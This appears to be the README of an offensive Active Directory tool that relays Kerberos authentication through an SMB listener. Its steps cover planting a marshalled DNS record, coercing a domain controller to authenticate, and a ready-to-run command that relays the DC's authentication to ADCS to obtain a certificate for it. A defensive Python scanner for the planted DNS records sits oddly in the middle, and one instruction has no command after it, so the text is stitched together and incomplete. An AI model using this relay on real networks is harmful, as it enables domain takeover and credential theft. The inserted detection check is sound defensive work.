This krbrelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP.
It's 90% based on @cube0x0's KrbRelay:
To control the SPN for relaying, James Forshaw's CredMarshalTargetInfo() trick is required:
Create a DNS entry for the target server_name whose Kerberos AP-REQ you want to relay: `<server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA`, mapped to your listener/relay IP.
Domain users can typically perform secure DNS updates; for example, you can use the PowerShell script invoke-dnsupdate to add the DNS entry.
Trigger the SMB authentication with a third-party tool (for example DFSCoerce, PetitPotam, etc.) and relay it to the attacker machine.
Because the SMB listener needs port 445, you have two options on the Windows attacker machine:
- use a Linux box acting as redirector
- disable the SERVER service on your Windows machine; you can use smb_control.bat to perform these tasks.
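A defender-side check, added here and not part of this project: it scans a DNS zone listing for host names that carry the CredMarshalTargetInfo() suffix shown above and reports which host each entry impersonates and whether its address differs from the legitimate record. The zone lines and IP addresses are constructed sample data, not real records.

```python
# Suffix that CredMarshalTargetInfo() produces for the relay DNS entry (from the README above).
MARSHAL_SUFFIX = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"

# Constructed sample zone export, "name type data" per line (not real records).
SAMPLE_ZONE = """\
adcs-mylab A 10.0.0.20
dc01 A 10.0.0.10
adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA A 10.0.0.99
fileserver1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA A 10.0.0.99
"""


def parse_zone_lines(text):
    """Parse whitespace-separated 'name type data' lines into (name, type, data) tuples.

    Blank lines and lines without an A/AAAA record type are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[1].upper() not in ("A", "AAAA"):
            continue
        records.append((parts[0], parts[1].upper(), parts[2]))
    return records


def find_marshaled_entries(records):
    """Return one finding per record whose name ends with the marshal suffix.

    Each finding names the impersonated host, the address of that host's normal
    record (None if the zone has none) and the address the suspicious entry points to."""
    legit = {name.lower(): data for name, rtype, data in records
             if not name.endswith(MARSHAL_SUFFIX)}
    findings = []
    for name, rtype, data in records:
        if not name.endswith(MARSHAL_SUFFIX):
            continue
        target = name[:-len(MARSHAL_SUFFIX)].lower()
        findings.append({
            "record": name,
            "impersonates": target,
            "legit_address": legit.get(target),
            "points_to": data,
            "address_mismatch": legit.get(target) != data,
        })
    return findings


if __name__ == "__main__":
    for f in find_marshaled_entries(parse_zone_lines(SAMPLE_ZONE)):
        print(f"{f['record']} impersonates {f['impersonates']} "
              f"(legit {f['legit_address']}, points to {f['points_to']})")
```

Feed it the output of your own zone export instead of the sample text to review a real zone; any hit is worth investigating since legitimate hosts do not carry this suffix.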
This is a quick & dirty adaptation of the original project, leaving cleanup and optimization to you ;)
# Relay the DC SMB authentication to HTTP (ADCS) web enrollment and request a client certificate, using a Linux box redirecting to the Windows attacker machine on port 9999:

```
krbRelay.exe -spn http/adcs-mylab.mylab.local -redirecthost adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 9999
```

# In another window:
# Special command line switches:
- `-listenerport`: relay listener port
- `-redirecthost`: relay server/redirector mapped to the special DNS entry `<server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA`
- `-relayeduser`, `-relayeduserdomain`: optional, used to specify the user/machine and domain; useful in certain cases (the exact reason is not known) when certificate creation fails because of an empty CN

For detailed usage and command line switches refer to the original krbrelay tool.